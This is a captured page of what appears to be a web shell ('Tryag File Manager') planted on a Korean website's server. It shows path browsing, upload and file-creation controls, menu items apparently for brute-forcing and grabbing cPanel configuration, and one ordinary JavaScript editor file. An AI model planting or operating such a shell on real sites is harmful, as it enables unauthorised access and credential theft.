Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
nonga.eemo.co.kr
/
public_html
/
www
/
assets
/
js
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/nonga.eemo.co.kr/public_html/www/assets/js/pages_articles_edit.js
$(function() { $('.article-edit-tagsinput').tagsinput({ tagClass: 'badge badge-default' }); if (!window.Quill) { $('#article-editor,#article-editor-toolbar').remove(); $('#article-editor-fallback').removeClass('d-none'); } else { $('#article-editor-fallback').remove(); new Quill('#article-editor', { modules: { toolbar: '#article-editor-toolbar' }, theme: 'snow' }); } });